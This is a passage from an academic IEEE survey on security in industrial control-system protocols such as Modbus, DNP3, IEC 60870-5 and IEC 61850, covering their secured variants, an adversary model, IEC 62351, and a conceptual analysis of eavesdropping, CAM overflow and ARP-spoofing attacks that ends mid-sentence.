as the protocols they are derived from. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 622 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 TABLE II CLASSIFICATION OF RELATED WORK (PART 2) Fig. 1. Protocol overview and ISO/OSI layer coverage. letters located to the right of each marked node represent the International Organization for Standardization (ISO)/OpenSystems Interconnection (OSI) layers covered by the respec- tive protocol. The letters are abbreviations of: A application layer, T transport layer, N network layer, DL data link layer, and P physical layer. Note that in the rest of this section while presenting the message structure of speci c pro- tocols, we use the following semantics in the corresponding gures: The width of each message is of 1 Byte (demonstratedo n l yi nF i g . 3, whereas for the other gures it is eliminated to save space). Furthermore, whenever the size of a speci c eld of a message is longer than 4 Bytes, we present the unde ned e l d s i z e w i t h ... , s u c h a s f o r D a t a i n F i g . 3. 1) Modbus: The Modbus protocol was developed and pub- lished by Modicon in 1979 and is foremost used in processautomation. Modbus is still widely used, mainly because it isan open standard and has a simple structure. The responsibility for the maintenance and further development of the protocolFig. 2. ISO/OSI layer structure of Modbus protocol. Fig. 3. Modbus message structure. lies with the Modbus organization. Modbus de nes two dif- ferent transmission methods: First, Modbus serial, which is used for communication via serial interfaces such as RS232 and RS485. Second, Modbus Transmission Control Protocol(TCP)/Internet Protocol (IP), which supports communicationover a TCP/IP network. Two different transmission modes are de ned for Modbus serial transmissions: Modbus RTU, for binary data encoding, Modbus American Standard Code for InformationInterchange (ASCII), which encodes the data using an ASCII character set in the form of readable characterstrings. Modbus works according to the master/slave principle. A master can communicate with one or more slaves. Only the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 623 slave explicitly addressed by the master may return data to the master. The protocol supports only binary and 16-bit values,which are read by the master in blocks. Neither quality mark-ings nor time stamps are supported. Fig. 2shows the ISO/OSI layer structure of the Modbus protocol, whereas Fig. 3depicts the structure of a Modbus serial message. There have been attempts to secure the Modbus proto- cols over time, e.g., in [ 28] (referred to as Modbus-F2009 from here on), [ 29] (referred to as Modbus-S2015 from here on), and [ 30] (referred to as Modbus-A2018 from here on). Modbus-F2009 only offers integrity and authentication, while Modbus-S2015 and Modbus-A2018 provide con dentiality, integrity and authentication by applying well-known networksecurity methods, such as symmetric and asymmetric cryp- tography, authentication, and replay protection mechanisms. More precisely, the Modbus successors have the followingproperties: Modbus-F2009: Rivest, Shamir and Adleman (RSA) sig- natures and Secure Hash Algorithm (SHA)-2 hashing are used to provide security. Modbus-S2015: Both RSA signatures and SHA-2 hash- ing are employed, similar to Modbus-F2009. However, in addition, Advanced Encryption Standard (AES) encryp-tion is used for con dentiality. Modbus-A2018: A challenge-response authentication mechanism and AES encryption are employed to secure the protocol. In the further analysis, the original Modbus protocol as well as its secure modi cations are investigated. 2) OPC/OPC UA: OPC was rst released in 1996 by the OPC Foundation, at the time by the name Object Linking and Embedding for Process Control . The OPC protocol istoday widely used in process automation, most notably tointerconnect process data to HMI devices. OPC employs a client/server principle, where a client (mas- ter) can access one or more servers (slaves). A server acts asdata provider for the clients that obtain the data. OPC de nes a number of interfaces serving various purposes, which are named in the following: Data Access (DA): This interface is the most well-known and is used to access process data. Alarm and Event (AE): The AE interface supplements the DA and is used to transmit events and alarms. Historical Data (HD): A supplement to the DA interface, which can transfer historical data. DA XML: Based on the DA interface, this relatively new interface uses eXtensible Markup Language (XML) forencoding DA content. The latest development of the OPC standard is OPC UA, which was released in 2006 and combines the previous tech-nologies from OPC DA, AE and HD. It is a pioneeringstandard for Industry 4.0 and Internet of Things (IoT). In con- trast to most other CSCPs, the TCP/IP-based, service-oriented protocol offers both encryption and user authentication mech-anisms. The most striking difference between OPC UA and its predecessors though is that it no longer is a Microsoft Windows exclusive protocol, but is available on numerousoperating systems as well as on-chip solutions. The ISO/OSIFig. 4. ISO/OSI layer structure of OPC UA protocol. Fig. 5. OPC UA message structure. stack of OPC UA is depicted in Fig. 4, and the message structure of OPC UA binary is shown in Fig. 5. 3) TASE.2/ICCP/IEC 60870-6: The TASE.2 (which is sim- ilar to IEC 60870-6 and Inter-control Center CommunicationsProtocol (ICCP)) is a standard used for wide-area communica-tion between control centers in the electric power transmission network, which was standardized in 1997 by the IEC. It enables the exchange of time-critical information between con-trol systems via Wide Area Network (WAN) and Local AreaNetwork (LAN). Its scope is similar to that of OPC, but is unlike early versions of OPC not tied to a particular operating system. The standard by itself does not address authentication or encryption (these services may be provided by lower protocol layers, though). TASE.2 relies on Manufacturing MessagingSpeci cation (MMS), its core functions are speci ed as sets Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 624 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 Fig. 6. ISO/OSI layer structure of TASE.2 protocol. Fig. 7. TASE.2 message structure. of so-called Conformance Blocks , such as, e.g., periodic system data, device control, etc. The ISO/OSI layer structureof TASE.2 is given in Fig. 6. Its message structure is depicted in Fig. 7. 4) DNP3: The DNP3 protocol is developed for commu- nication with telecontrol substations and other IntelligentElectronic Devices (IEDs). It is especially tailored for theusage in energy-related SCADA systems and is widely adopted by North American power system utilities. The development was originally carried out by the Harris company, which in1993 turned the development and maintenance over to the DNP3 User Group, an association of users and suppliers of the protocol. Originally, the DNP3 protocol was developed for use on slow, serial communication links. However, during the devel- opment of DNP3, support for communication via TCP/IP networks was also implemented. In contrast to similar pro-tocols, such as IEC 60870-5-101, DNP3 has a very powerful user layer (a layer on top of the ISO/OSI application layer, containing user data), which allows the data to be decodedeven without implicit parameters. DNP3 has a variety of waysto display information objects and provides a high degree of interoperability on the user layer. This is achieved at the cost of increased complexity, which in turn requires a highimplementation and testing effort. Unlike IEC 60870-5-101, the protocol has a transport layer that allows a fragmented transmission of large amounts of data.This bene ts the protocol when communicating over TCP/IP,because the entire bandwidth of the network can be effec- tively utilized. Another advantage over IEC 60870-5-101 isFig. 8. ISO/OSI layer structure of DNP3 protocol. Fig. 9. DNP3 message structure. the possibility to request an acknowledgment from the otherside on the user layer. As a result, a substation can remove the data from the buffer depending on whether these have beenacknowledged by the destination. The data link layer is based on IEC 60870-5-1 and IEC 60870-5-2, similar to IEC 60870-5-101. However, only a bal- anced mode is used, which is intended only for full-duplexpoint-to-point connections. Since DNP3 is also used in semi- duplex networks, a collision avoidance mechanism exists. The ISO/OSI layer structure of DNP3 is depicted in Fig. 8, while the message structure of DNP3 is visible in Fig. 9. Similar to the Modbus protocol, it is noteworthy that several attempts were made to secure DNP3 already, the most well- known ones being the DNPSec [ 32] and DNP3 SA (which is part of the Institute of Electrical and Electronics Engineers (IEEE) 1815-2012 standard [ 48]) [36] protocols, offering the following security features: DNPSec: The DNPSec protocol employs Triple Data Encryption Standard (3-DES) and Hash-based Message Authentication Code (HMAC) SHA-1 to provide security. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 625 DNP3 SA: In contrast to DNPSec, no encrytion is used. Integrity and authentication are provided by Challenge-response HMAC/Galois Message Authentication Code(GMAC) and SHA-2 hashing. It needs to be noted at this point that the cryptographic algorithms employed in DNPSec (3-DES and SHA-1) are con-sidered broken by now and are insecure against sophisticated attacks [ 49], [50]. Therefore, during the security analysis in Section V-C, the security features of DNPSec are regarded as ineffective against attacks. In the following, the original DNP3protocol as well as both DNPSec and DNP3 SA are included in the security analysis of this paper. 5) IEC 60870-5-101: The IEC 60870-5-101 protocol is an international standard and was released by IEC in the early1990s. The protocol was widely used in the eld of power systems and is still used very frequently today. It is based on the so-called Enhanced Performance Architecture (EPA) and,according to the OSI layer model, this protocol only de nes the physical, data link, and application layers. IEC 60870-5-101 is mainly used on relatively slow trans- mission media using the asynchronous V .24 interface. The useof the X.24/X.27 interface with baud rates of up to 64000 bit/s, which is also de ned in the standard, is hardly used in practice. The IEC 60870-5-101 standard is a companionstandard and is supplemented by several others, as depicted in Fig. 1: IEC 60870-5-1: Different frame formats are de ned here, whereby only the format FT1.2 is used for IEC 60870-5-101. IEC 60870-5-2: De nes the transfer methods of the datalink layer. IEC 60870-5-3: Describes the basic structure of the user data. IEC 60870-5-4: De nes the encoding of information elements. IEC 60870-5-5: Describes basic functions of the user layer. The IEC 60870-5-101 was signi cantly extended and speci- ed in the year 2001 by a second amendment. Interoperabilitybetween devices from different manufacturers is ensured by means of a so-called interoperability list, the structure of which is de ned in the standard. The original standardleft much room for interpretation, leading to many imple- mentations that are not necessarily compatible with each other. A great advantage of IEC 60870-5-101 is the robustness of the data link and the simple structure of the application layer. The focus was placed on performance during the de nition. To achieve this, certain information required to decode thedata is not sent. The decoding of the data is only possible with correctly set parameters such as size of the information object address, size of the ASDU address, etc. In practice, thematching of parameters between components with the help ofthe interoperability list is easily possible and does not represent a major challenge. A major disadvantage however are the gaps in the de ni- tion of the protocol, which often lead to problems. Particularly with respect to line redundancy, many different implementa- tions exist, which require project-speci c clari cations. Fig. 10Fig. 10. ISO/OSI layer structure of IEC 60870-5-101 protocol. Fig. 11. IEC 60870-5-101 message structure. shows the ISO/OSI layer structure of IEC 60870-5-101, Fig. 11shows the IEC 60870-5-101 message structure. 6) IEC 60870-5-104: The IEC 60870-5-104 protocol is an international standard and was released in 2000 by the IEC. As the name of the standard network access for IEC 60870-5- 101 using standard transport pro les suggests, the protocol isdeeply linked with IEC 60870-5-101. IEC 60870-5-104 allowscommunication between the control center and the substation via a standard TCP/IP network. The TCP protocol is especially used for connection-oriented and secure data transmission. IEC 60870-5-104 limits the information types and con g- uration parameters de ned in IEC 60870-5-101 so that not all IEC 60870-5-101 functions are also supported by IEC60870-5-104. Among others, IEC 60870-5-104 does not sup-port short time stamps; also, the sizes of the individual address elements are permanently set to maximum values. In prac- tice, however, manufacturers often place the IEC 60870-5-101application layer on the IEC 60870-5-104 transport pro le without taking its limitations into consideration. This can lead to problems with devices which strictly adhere to the standard. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 626 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 Fig. 12. ISO/OSI layer structure of IEC 60870-5-104 protocol. Fig. 13. IEC 60870-5-104 message structure. Fig. 14. Parts of IEC 61850. Interoperability between devices from different manufacturers is ensured by means of the so-called interoperability list , thestructure of which is de ned in the standard. The main advantage of IEC 60870-5-104 is communica- tion over a standard network, which allows simultaneous datatransmission with several devices and services. Otherwise, the advantages and disadvantages of IEC 60870-5-101 apply to IEC 60870-5-104, too. Fig. 12depicts the ISO/OSI layer struc- ture of IEC 60870-5-104, Fig. 13shows the IEC 60870-5-104 message structure. 7) IEC 61850: IEC 61850 is the latest standard for commu- nication networks and systems in substations and encompasses a large variety of concepts including 10 parts, depictedin Fig. 14. Apart from the rst two parts covering the introduction and glossary, parts 3, 4, and 5 of the standard start by identi-fying the general and functional requirements for substationcommunication. In order to assist the con guration of all components from a system level perspective, a XML-basedSubstation Con guration Language (SCL) is de ned in IEC 61850-6. It allows to de ne the relationships between thesubstation automation system and the substation itself. To pro-vide information regarding its con guration, each device in the system must provide a SCL le. One of the main architectural novelties introduced by IEC 61850 is an abstract de nitionof its data items, which rst allows the creation of data items and services that are agnostic regarding their underlying protocols. Second, these abstract items can be mapped ontoany underlying protocol. While the de nition of abstract dataitems is covered in IEC 61850-7, the speci c mapping onto Generic Object Oriented Substation Events (GOOSE), MMS or Sampled Values (SV) is included in IEC 61850-8 and IEC61850-9, respectively. IEC 61850-10 de nes a conformance test with the numerous protocol de nitions and constraints de ned in the document. While the standard covers the needs of the station automa- tion regarding communication structures and the object-related data model, it is generally designed to also support many other automation applications. The basic principles are retained andsupplemented by sector-speci c data models, e.g., for com- munication, monitoring and control of wind power plants or hydroelectric power stations. Unlike IEC 60870-5-104, IEC61850 is only de ned for the station bus. From a technicalpoint of view, however, IEC 61850 is also suited for pro- cess data transmission between stations and network control systems. This allows a complete system architecture from theprocess to the station control system and the grid control pointwithout requiring the application of gateways. The IEC 61850 ISO/OSI layer structure is visible in Fig. 15,F i g . 16shows the IEC 61850 message structure. B. Protocol Security Overhead In the protocol overview, several modernized variants of Modbus and DNP3 are discussed. It needs to be noted here,however, that the increased security realized within the dis- cussed protocol variants comes at the price of performance, mainly due to en-/decryption and signature procedures used.While the performance overhead incurred due to such security measures is commonly not a major issue, within the con- text of control systems, there are often real-time performancerequirements (see Section III-D ). Therefore, in this section, a brief overview regarding the performance overheads of the enhanced variants of the Modbus or DNP3 protocol, respectively, is given. Modbus-F2009: Fovino et al. [28] state that in their test scenarios, the protocol causes a performance overhead of 291% at maximum and 12% at minimum (relative to theoriginal Modbus protocol). Modbus-S2015: To the best of our knowledge, there is currently no information available regarding the performance overhead incurred by the usage Modbus-S2015. However, it is expected that the overhead is at least as high as with Modbus-F2009, as both employ sig- natures and SHA-2, and in addition, Modbus-S2015 usesencryption. Modbus-A2018: According to [ 30], the Modbus-A2018 protocol variant leads to a performance overhead of 500% Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 627 Fig. 15. ISO/OSI layer structure of IEC 61850 protocol. TABLE III OVERVIEW AND COMPARISON OF PROTOCOL FEATURES (PART 1) TABLE IV OVERVIEW AND COMPARISON OF PROTOCOL FEATURES (PART 2) at maximum and 0% at minimum (relative to the original Modbus protocol). DNPSec: To the authors knowledge, there is no quanti- tative performance evaluation available investigating the DNPSec protocol. However, Lee et al. [21] provides a qualitative estimation of the performance overhead, whichis considered as high. DNP3 SA: Similar to DNPSec, [ 21] states that the performance overhead is considered medium . However, the performance of DNP3 SA also depends on theusage of the non-aggressive or aggressive mode (furtherinformation available in IEEE 1815-2012). C. Requirements For the above-described CSCPs applied in the industrial context, three basic security requirements need to be consid-ered in addition to the corresponding protocol s performanceas this has a signi cant impact to the practicability of the proposed solution. Next, we give the exact de nition of the security requirements considered in this paper, which are basedon the ones illustrated in the technical speci cation report IEC 62351-1: Con dentiality: Prevention of unauthorized access to information by individuals, entities or processes. Integrity: Prevention of unauthorized modi cation or altering of information. Availability: Prevention of denial of service and insurance of authorized and continuous access to information. While all of these aforementioned security goals do exist in the context of ICSs, it is noteworthy that their importance gets reordered. The most important goal in ICSs is availability, followed by integrity and con dentiality, in contrast to theusual CIA order. Regarding performance, control systems have real-time requirements where decisions need to be taken quickly (within seconds) and any fraction of downtime period of the systemcould result in investment and reputation losses as well asenvironmental disasters. An application scenario can be found within the context of smart grids, where ICT plays an eminent role especially in demand/response schemes. Here real-timeconstraints are present as the decisions on how resources are controlled have a drastic impact on the overall system behav- ior. In this context, the major objective is to match energygeneration and consumption. If such a balance is not met, itjeopardizes the stability of the grid which leads to brown- and blackouts. D. Challenges Control system s security has been a wide-spread topic in the ICT community in the last years, in particular with regard to CSCPs. This development was only fostered by Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 628 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 Fig. 16. IEC 61850 message structure. several successful attacks in the past receiving public atten- tion, e.g., [ 2], [4], and [ 51]. While the development of control system communication standards is accelerating, the current situation with control systems is often coined by a discrepancybetween old and new. Numerous challenges can be highlighted in implementing security requirements within the context of networked control systems (e.g., SCADA) in practice. As previously mentioned,hardware/software and networking for such systems were designed and developed back in the 1970s, which consequently results in limited processing, storage and communication band-width. As a matter of fact, the conventional security measuresdevised within the context of ICT and networking technologies become extremely challenging to be implemented in con- trol systems. Exchanging these legacy parts would either beconnected to high costs due to revenue loss during transi- tion time or not be possible at all because of custom builds often working with code written by operators no longer work-ing for the company. What s worse, these legacy controlsystems were often designed in a time where security concerns were dangerously neglected. Additionally, control systems areused in wide-spread industrial sites which necessitates the physical intervention of personnel and results in dif cultyin implementing key management, certi cate revocation andother security measures. Finally, although security measures in wireless systems were improved in the last decade, wire- less technologies are still not widely used in control systemsdue to extremely noisy environment (e.g., power systems) that might perturb the corresponding signal. This derives the conclusion that control systems have spe- ci c requirements, which have to be considered while thinkingof security strategies. Often, these requirements cause con icts and contradictions between well-known protection methods and a functional control system. To get an overview, the mostimportant requirements of control systems are listed below: Legacy constraint: Often control systems consist of legacy components with low bandwidth, little compu-tational power and/or limited storage space [ 52]. Some even are not supported any more by their vendors with updates or patches. This often is due to the long lifecycle of control system products, which can be up to 30 years.A change of these components will often result in high costs or revenue loss due to downtime which companies are not willing to accept. 24/7 constraint: Control systems, which supervise criti- cal infrastructures need to be operational all time. Even a short downtime can cause huge monetary or rep- utation damage or even endanger human lives (e.g.,blackouts) [ 53]. Real-time constraint: In industrial control systems, the devices have to react as quickly as possible to com- mands given by the operator through a control system.Often, if a critical state is reached, the decision has to be made in a matter of seconds. This means that low latency and ef cient use of bandwidth are critical forthese systems [ 53]. IV . A DVERSARY MODEL An adversary model is a common method to summarize assumptions about the nature, signi cance and resources of persons and organizations tending to perform malicious activ- ities and cause harm to the system [ 54]. The adversary model is developed to describe the capabilities of a potential attacker,indicate the threats and attack scenarios. Nowadays, due to the diversity of possible attacks and interests of different actors, it is especially important to investigate the threat landscapeprecisely. This section presents a collaborative overview on threat actors and discusses their features. In general, adver- saries, also de ned as threat actors, can be classi ed asoutsiders, having no authorized access to telecontrol systems,and insiders, i.e., legal entities with a certain set of permissions in the targeted system. This approach is used, for example, in [55]. According to IEC 62351-1 part 5.2.3, eight classes of potential threat actors can be distinguished. This classi ca- tion is however incomplete, until corresponding threat levelsare assigned. Here, a threat level is a qualitative measure ofpotential impact, which occurs if an adversary completes its attack successfully. Moreover, the standard presents viruses Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 629 TABLE V ADVERSARY MODEL and worms as a separate threat actor. This makes the model incoherent, since viruses and worms need to be considered as tools, not threat actors themselves. Furthermore, dependingon the type of virus or worm and the targeted element(s) ofthe system, different threat levels are required. As a result, this class of threat actors is not considered in this paper. In the following, the threat actors investigated in the analysis(Section V-C) are listed: Unskilled and skilled outsiders: Outsiders with various level of hacking skills are common adversaries whichsystem defenders are facing. Usually these actors haveno ideology except the curiosity to break the security of a system. Unskilled outsiders are usually able to detect reachability of hosts in control networks and use com-mon tools for penetration testing, but do not have any special knowledge regarding CSCPs. Skilled outsiders in addition possess enough experience in breaking telecon-trol systems and network security. This makes it rationalto attach different threat level to outsiders depending on their skills. Industrial espionage: Not only persons but entire orga- nizations may be interested in breaking control network security. Resulting availability problems may lead to cus- tomers changing their provider; also, sensitive informa-tion can be stolen. Organizations have enough resourcesto employ high skilled professionals, but have to work secretly not to disclose their illegal activities. Trusted insiders: One of the most common threats are malicious insiders that can have low hacking skills, but hold enough information about systems architecture and maintenance. Potential harm depends on the position andsecurity clearance of the insider. Malicious administra-tors, as a worst case scenario, have enough knowledge to ruin security systems as well as the whole critical infrastructure causing catastrophic damage. Terrorist groups: Nowadays terrorist and hacker groups are becoming one of the most dangerous actors in cyberspace. These organizations aim to perform attackson critical infrastructures in order to present their ideol-ogy and personal beliefs [ 13]. Potential damage depends on the resources such a group has access to. Several ter- rorist and hacker groups get support from their nationsand interested organizations. Nevertheless, highly skilled professionals are usually employed by terrorist groups or join it on their own. National states, foreign intelligence services: According to [13], the most powerful actors in critical infrastruc- tures security are hostile nations and their intelligence services. Having almost unlimited resources, hostilenations can hire skilled professionals to damage criti- cal infrastructures such as power, water and industry to in uence the current political situation. These attacks cancause loss of citizens lives. Another common motiva-tion is espionage and collection of information about national infrastructures for future purposes. Moreover, national cyber security services are interested in test-ing their possibilities to gain access to another nation s resources. Table Vpresents an overview of the adversary model described above. It de nes a set of major properties for eachof the de ned adversaries: Threat level: A qualitative marker which allows to dis- tinguish different classes of adversaries based on theiroverall potential impact, if an adversary completes its attack successfully. Motivation: Summarizes assumptions about possible stimulus. Impact: A qualitative marker which describes potential damage (data, human, or environmental), similar to ISO 31000/IEC 61508 [ 56]. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 630 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 Resources: Summarizes assumptions about computational power available to the adversary. Level of hacker skills: Summarizes assumptions regarding the professional knowledge possessed by the adversary. Typical attacks: Provides examples of possible security breaches, which are later discussed in Section V. The set of properties is not exhaustive, however more prop- erties can be de ned to complete the adversary information, such as necessity of the physical access, requirement of thespeci c hardware, and sustainability of the deployed securitymeasures to the malicious activity. V. P OTENTIAL SECURITY BREACHES IN CONTROL SYSTEM COMMUNICATION PROTOCOLS This section covers attacks related to CSCPs. The origin of the vulnerabilities for most of the protocols is the lack ofbasic con dentiality, integrity and authentication mechanisms for data communication. Lack of con dentiality and integrity leads to unwanted access to and possible modi cation of datatransmitted over the channel. At the same time, lack of authen- tication is a reason of the unquestioning acceptance of all the commands received by RTUs. Attacks are classi ed based onthe security requirements they violate. For some interactionattacks, such as replay or MitM, several classes are possible. A. IEC 62351 Standard Overview The scope of the IEC 62351 standard is to provide power systems with the relevant end-to-end security information for their control operations. For this purpose, the main objectiveis to propose development of standards for security of thecommunication protocols de ned by IEC TC57, especially for the IEC 60870-5, IEC 60870-6 and IEC 61850 series [ 57]. To this end, the standard is divided into 13 parts: Part 1: Introduction to the standard. Part 2: Glossary of terms. Part 3: Security for pro les including TCP/IP. Part 4: Security for pro les including MMS. Part 5: Security for pro les including IEC 60870-5. Part 6: Security for IEC 61850 pro les. Part 7: Security through network and system manage-ment. Part 8: Role-based access control. Part 9: Key management. Part 10: Security Architecture. Part 11: Security for XML les. Part 12: Resilience and security for power systems. Part 13: Guidelines on security topics to be covered instandards. B. Methodology Taking the constraints/challenges of Sections III-C andIII-D into account, the three security requirements (i.e., con den- tiality, integrity and availability) are satis ed through thecombination of security management techniques and technolo-gies. Among several, certi cate and key management (e.g., authentication) together with encryption (e.g., AES) are themost prominent countermeasures to the security threats dis- cussed in Section V-C. It is worthwhile to note that security is an end-to-end requirement of control systems for the sake ofensuring authenticated access to sensitive equipment, autho- rized access to data and information on equipment failures. Due to this large spectrum, a one size ts all paradigm isnot appropriate as each asset needs to be secured based on its required security level. To this end, a continuous security process cycle is proposed in the IEC 62351 standard, whichconsists of the following ve steps: (1) security assessment,(2) security policy, (3) security development, (4) security train- ing and (5) security audit. In this paper, we focus on the rst step of this cycle for the purpose of our analysis and results.More precisely, the considered methodology consists of assess- ing assets by considering their security requirements and the probable risks of attack. For this purpose, we carry out thesecurity assessment by studying the protocols without (pre)and with (post) the implementation of the IEC 62351 security standard. The end result of such a methodology is to qual- itatively highlight the security improvements of IEC 62351as well as to emphasize the missing parts of such a stan- dard within an industrial context such as smart grid SCADA systems. The reason for using a qualitative analysis is the dif -culty to extract real and exact numbers from industrial controlsystems due to con dentiality reasons. It is noteworthy that regarding the usage of IEC 62351 in the Modbus protocol, its application is possible theoretically (e.g., using Transport Layer Security (TLS) to secure Modbus TCP communication);however a technical realization may often be hardly achiev- able, due to resources limitations present in legacy Modbus systems. In the upcoming analysis, an applicability of IEC62351 on the Modbus protocol is assumed to be possible. For the OPC UA protocol, no application of the IEC 62351 secu- rity standard is considered, as OPC UA implements its ownsecurity features without relying on IEC 62351. Therefore, inthe following, no pre-/post-IEC 62351 analysis is performed for OPC UA. C. Analysis 1) Con dentiality Violation Attacks: a) Detection of control system devices: The initial step of all communication-based attacks is the detection of devices in the network. For detecting control system devices two approaches can be considered passive and active. A pas-sive approach implies that an interface is being set up in promiscuous mode to subsequently monitor traf c. During active detection, packets are sent out from an attacker sdevice in order to obtain responses from control systems. TheApplication Protocol Data Units (APDUs) sent during active detection carry speci c control commands which force target devices to answer with con rmation. Measures, de ned by IEC 62351: There are no comprehen- sive counter measures de ned in the standard. General security recommendations are discussed in Section V-D. In Table VI, the results for the device detection attack analysis are summarized. b) Eavesdropping: Eavesdropping is an example of SCADA communication con dentiality violation. Because of Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 631 TABLE VI VULNERABILITY ANALYSIS RESULTS FOR DEVICE DETECTION ATTACK the lack of inbuilt con dentiality protection, these attacks are easy to perform. Eavesdropping represents a common activityof outsiders with low hacking skills. By eavesdropping on the communications of control system devices, attackers can learn control commands while simply listening to the traf c, and logmessage exchanges between different nodes. As there usuallyare no encryption mechanisms speci ed for CSCPs, using an eavesdropping attack, adversaries can obtain a full image of the current system state. Detected traf c can be used later formore sophisticated attacks, such as replay and MitM. Real case scenarios: Modbus, IEC 60870-5-101, IEC 60870-5-104: One of the most suitable methods to attack Modbus and IEC 60870-5-based protocols is by port mirroring, as described in [26]. To capture packets, an attacker has to con g- ure a span port on network devices, so that all targetedtraf c is retransmitted to the attacker s system. There areseveral ways how a span port can be con gured, such as gaining administrative privileges on network devices for outsiders or direct access for insiders. Attackers requiresome experience in serial protocols message exchange. Capturing of messages is a con dentiality violation and can lead to active attacks. TASE.2: By design, the TASE.2 protocol does not include any inbuilt security measures. The con dentiality of information transmitted over the TASE.2 connection is expected to be implemented by the underlying protocols. DNP3: For the scenario of DNP3, this type of attack was analyzed within a testbed setup by eavesdropping the network traf c between a slave IED and master gate-way through ARP cache poisoning [ 33]. A side-effect of eavesdropping was the successful manipulation of the Media Access Control (MAC) addresses by the attacker, who altered the destination MAC address of the frame tothe attacker s machine address. Whereas the forwarding of messages to the attacker s machine does not have any further direct security implications except for a con den-tiality violation, it however induced an increased delayin the communication, which in certain cases could be deemed dangerous, especially if fast reaction times are required. IEC 61850: Using an ARP spoo ng approach, an adver- sary can launch a MitM attack on the MMS communica- tions of IEC 61850. Based on this MitM attack, severalkinds of attacks can further be launched, among oth-ers eavesdropping. An example scenario would be an adversary that wants to gather additional information byTABLE VII VULNERABILITY ANALYSIS RESULTS FOR EA VESDROPPING ATTACK TABLE VIII VULNERABILITY ANALYSIS RESULTS FOR CAM TABLE OVERFLOW ATTACK eavesdropping on the hijacked or tapped communication before carrying out further attacks. Such a scenario is described in [ 41]. Measures, de ned by IEC 62351: The encryption applied by TLS through IEC 62351 is an effective mean to prohibit adver- saries from accessing information through eavesdropping. In Table VII, the results for the eavesdropping attack analysis are summarized. c) Content addressable memory (CAM) table over ow attack: One of the possible con dentiality violation attacks which gain the possibility to eavesdrop on CSCPs with TCP/IP pro le is the CAM table over ow attack [ 58]. Data link layer s switching devices process Ethernet frames based on MAC orhardware addresses. A CAM table maps the switch ports tothe destination MAC addresses. As a result, frames are sent to the intended address on an individual basis. If an attacker trig- gers a CAM table over ow, it forces a switching device to actas a hub, i.e., broadcast Ethernet frames to all ports. Attackers can ood the CAM table with new MAC-port entries in order to ll up the device s memory. As a result, the target deviceis not able to function as intended and begins broadcastingEthernet frames to all available ports. Having access to one of the ports, e.g., for external connections, attackers are able to listen and capture the traf c that ows through the switchingdevice. Real case scenarios: This attack exploits the functionality of Ethernet switches. Since there are several CSCPs in substationnetworks that use Ethernet switches to connect IEDs, all IECsubstations are vulnerable to these attacks. Among these pro- tocols are, among others, Modbus, DNP3, IEC 60870-5-104, and IEC 61850. Experiments with IEC 61850 are observedin [59]. Measures, de ned by IEC 62351: There are no comprehen- sive counter measures de ned in the standard. General securityrecommendations are discussed in Section V-D. In Table VIII, the results for the CAM table over ow attack analysis are summarized. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 632 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 TABLE IX VULNERABILITY ANALYSIS RESULTS FOR MASQUERADE ATTACK d) Masquerade attack: An ARP spoo ng attack is an example of masquerading [ 44], [58]. This attack exploits the lack of veri cation and authentication support in CSCPs. ARP is a stateless protocol used to map an IP address to a physical machine address. The ARP cache is updated with new infor-mation each time a host receives a reply, whether a request was sent or not. ARP spoo ng is a way to modify a target host s ARP cache with a forged entry to allow attackers tomasquerade as a legitimate host and get access to traf c forfurther actions. Often ARP spoo ng is used to launch further subsequent attacks, such as MitM, session hijacking, or DoS. Real case scenarios: Modbus, IEC 60870-5-101, IEC 60870-5-104: Examples of successful utilization of ARP spoo ng as a step for a MitM attack are presented in [ 26] and [ 27]. DNP3, DNPSec: An eavesdropping attack was realized by Rodo le et al. [33] within the context of DNP3, where the attacker intercepted the communication as a result of ARP cache spoo ng. Due to the ineffective securitymeasures in DNPSec, a similar attack can be realized. IEC 61850: As previously discussed, using ARP spoo ng attacks, a masquerade attack is possible on IEC 61850, which is presented in [ 41]. Measures, de ned by IEC 62351: There are no compre- hensive measures de ned in the standard. General security recommendations are presented in Section V-D. In Table IX, the results for the masquerade attack analysis are summarized. e) Credential theft: Besides operator commands and system responses, typical data exchanges in critical infras-tructures such as smart grid also include customer names, identi cation numbers, schedule information and location data. These data are sensitive since they may carry credentials thatallow persons or organizations to gain access to the system.Credential-based attacks include several 